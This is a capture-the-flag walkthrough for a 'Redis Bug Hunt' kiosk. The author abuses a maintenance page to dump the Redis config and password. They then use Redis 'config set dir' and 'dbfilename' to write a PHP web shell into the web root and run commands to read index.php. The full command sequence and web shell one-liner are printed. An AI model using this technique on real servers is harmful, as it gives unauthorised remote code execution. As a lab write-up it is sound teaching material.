Kiosk 7: Redis Bug Hunt
The 7th Kiosk was beginning to get pretty red-teamy. It was located in the Kitchen next to Holly Evergreen:
My task was to simply view the source code for the index.php page. Doing this involved some exploitation, since the only way you are supposed to see PHP source code is if you have shell access to the machine and permissions to view it, and since I had shell but not permission, I simply needed to find a way around the wall. Let's dive in!
The prompt I'm presented with:
We need your help!!
The server stopped working, all that's left is the maintenance port.
To access it, run:
curl http://localhost/maintenance.php
We're pretty sure the bug is in the index page. Can you somehow use the
maintenance page to view the source code for the index page?
player@3db085afb144:~$
First, I ran what it told me to run:
player@3db085afb144:~$ curl http://localhost/maintenance.php
ERROR: 'cmd' argument required (use commas to separate commands); eg:
curl http://localhost/maintenance.php?cmd=help
curl http://localhost/maintenance.php?cmd=mget,example1
And once it yelled at me, I figured I would give it one of the example commands it offered me:
player@3db085afb144:~$ curl 'http://localhost/maintenance.php?cmd=help'
Running: redis-cli --raw -a '<password censored>' 'help'
redis-cli 5.0.3
To get help about Redis commands type:
"help @<group>" to get a list of commands in <group>
"help <command>" for help on <command>
"help <tab>" to get a list of possible help topics
"quit" to exit
To set redis-cli preferences:
":set hints" enable online hints
":set nohints" disable online hints
Set your preferences in ~/.redisclirc
Doing some research, I discovered that I could dump the redis config using the following command: curl 'http://localhost/maintenance.php?cmd=config,get,*'
And it displayed quite a bit.
player@3db085afb144:~$ curl 'http://localhost/maintenance.php?cmd=config,get,*'
Running: redis-cli --raw -a '<password censored>' 'config' 'get' '*'
dbfilename
dump.rdb
requirepass
R3disp@ss
masterauth
cluster-announce-ip
unixsocket
logfile
pidfile
/var/run/redis_6379.pid
slave-announce-ip
<<< snip >>>
And now I have the redis password! Before, using maintenance.php would censor the password used at each invocation of the command, but now I can use redis-cli to my heart's content, and that was particularly useful. I ran redis-cli and authenticated:
player@3db085afb144:~$ redis-cli
127.0.0.1:6379> AUTH R3disp@ss
OK
Then set to work on creating a webshell!
127.0.0.1:6379> config set dir /var/www/html
OK
127.0.0.1:6379> config set dbfilename agr0.php
OK
127.0.0.1:6379> set test '<?php system($_REQUEST["a"]); ?>'
OK
127.0.0.1:6379> save
OK
This basically told Redis to set the directory it would save its current running config to be a directory on the public-facing web directory. Then I gave it a filename to save the config to, then I set a new variable called test to a simple PHP webshell one-liner, then saved it. I can now access the file at localhost/agr0.php!
player@3db085afb144:~$ curl http://localhost/agr0.php?a=whoami
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
player@3db085afb144:~$ curl --output - http://localhost/agr0.php?a=whoami
REDIS0009� redis-ver5.0.3�
redis-bits�@�ctime�
� -�_used-mem
aof-preamble��� test www-data
example2#We think there's a bug in index.phexample1 The site is in maintenance mode���v��҈�player@3db085afb144:~$
There's some junk in the file, but I confirmed I have code execution by running a=whoami, which gets passed to the system function in PHP, which simply executes the string provided. whoami returned the user www-data!
To view the source code of index.php, I simply issued the command cat index.php to the curl command, making sure to replace the space with the HTML-escaped version, %20. I then redirected the output to the file /tmp/pwn3d.
player@3db085afb144:~$ curl -s 'http://localhost/agr0.php?a=cat%20index.php' >/tmp/pwn3d
player@3db085afb144:~$ cat /tmp/pwn3d
REDIS0009� redis-ver5.0.3�
redis-bits�@�ctime�
� -�_used-mem
aof-preamble��� test <?php
# We found the bug!!
#
# \ /
# .\-/.
# /\ () ()
# \/~---~\.-~^-.
# .-~^-./ | \---.
# { | } \
# .-~\ | /~-.
# / \ A / \
# \/ \/
#
echo "Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figure out what's going on"
?>
Another kiosk solved!